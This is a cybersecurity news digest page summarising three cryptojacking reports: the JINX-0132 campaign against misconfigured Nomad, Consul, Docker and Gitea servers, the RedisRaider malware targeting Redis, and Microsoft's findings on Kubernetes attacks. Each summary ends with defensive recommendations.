CyberSecurity news
FlagThis - #cryptojacking
|
@Wiz Blog | RSS feed
//
A widespread cryptojacking campaign is targeting misconfigured DevOps infrastructure, including Nomad, Consul, Docker, and Gitea, to illicitly mine Monero cryptocurrency. The attackers, tracked as JINX-0132, are exploiting known misconfigurations and vulnerabilities in publicly accessible web servers to deploy mining software. This campaign marks the first publicly documented instance of Nomad misconfigurations being exploited as an attack vector.
The JINX-0132 group uniquely avoids traditional identifiers, downloading tools directly from public GitHub repositories, including standard release versions of XMRig. This "living-off-open-source" approach complicates detection and clustering of their activities. They abuse insecure configurations and vulnerable software versions to hijack DevOps web servers. HashiCorp Nomad and Consul, Docker API, and Gitea servers are being targeted. Affected Nomad instances can manage hundreds of clients, representing significant compute power. To prevent such attacks, organizations are advised to review their configurations, activate security features like access control lists (ACLs) for Nomad, and properly configure Consul to prevent unauthorized access and resource utilization.
Share:
References :
Classification:
Aminu Abdullahi@eSecurity Planet
//
Cybersecurity researchers are raising alarms about a new, sophisticated cryptojacking campaign called RedisRaider, which targets publicly accessible Redis servers running on Linux. Discovered by Datadog Security Labs, RedisRaider employs an aggressive and technically complex attack chain to deploy Monero miners on compromised systems. The malware uses a custom-built scanner to identify vulnerable Redis servers across the internet, exploiting weak configurations to execute malicious cron jobs that download and run the primary payload.
The attackers behind RedisRaider have implemented advanced techniques to evade detection and analysis. The malware is written in Go and heavily obfuscated using a tool called Garble, hiding key functions within the code. Additionally, RedisRaider employs anti-forensic measures such as short key time-to-live (TTL) settings to erase traces, writing temporary files to cron directories to blend with system processes, and deleting keys and logs after execution to cover its tracks. These tactics make it challenging for security professionals to detect and analyze the malicious activity. Datadog's investigation uncovered that the same infrastructure used for the server-level attacks also hosted a web-based Monero miner, indicating a multi-pronged revenue generation strategy. The attackers generate income not only from hijacked Linux servers but also from unsuspecting website visitors. Experts emphasize the need for proper configuration and security measures for publicly accessible Redis servers, including strong authentication and access controls, to prevent RedisRaider and similar cryptojacking campaigns from compromising systems and stealing resources.
Share:
References :
Classification:
@www.microsoft.com
//
Microsoft Threat Intelligence is reporting a significant rise in cyberattacks targeting unsecured Kubernetes clusters. These attacks are primarily aimed at illicit cryptocurrency mining, with threat actors exploiting vulnerabilities such as unsecured workload identities and inactive accounts to gain unauthorized access to containerized environments. Data from Microsoft indicates that a concerning 51% of workload identities remained inactive in the past year, creating numerous potential entry points for attackers. The increasing adoption of containers-as-a-service among organizations has expanded the attack surface, making it more attractive for cybercriminals seeking to profit from stolen computing resources.
The dynamic nature of Kubernetes environments poses significant challenges for security teams. The rapid deployment and scaling of containers make it difficult to detect runtime anomalies and trace the origins of security breaches. Attackers often exploit misconfigured resources, outdated container images, inadequate network segmentation, and overly permissive access controls to infiltrate these environments. Observed attack vectors include compromising cloud credentials, deploying malicious container images, exploiting the Kubernetes API, conducting node-level and pod escape attacks, and injecting unauthorized network traffic. A recent example involved the use of the AzureChecker.exe tool to launch password spray attacks against cloud tenants, leading to the creation of cryptomining containers within compromised resource groups. To combat these evolving threats, Microsoft has been working with MITRE to update the Kubernetes threat matrix and the ATT&CK for Containers matrix. This provides a structured framework for organizations to systematically assess and mitigate attack surfaces in containerized environments. Security best practices highlighted include implementing immutable container policies, enforcing strong authentication, employing rigorous vulnerability management, using admission controllers, establishing image assurance policies, and continuously monitoring API activity. Furthermore, a Docker malware campaign has been discovered exploiting Teneo Web3 nodes by faking heartbeat signals to earn crypto, showcasing the diverse methods attackers are using to generate revenue from compromised container environments.
Share:
References :
Classification:
|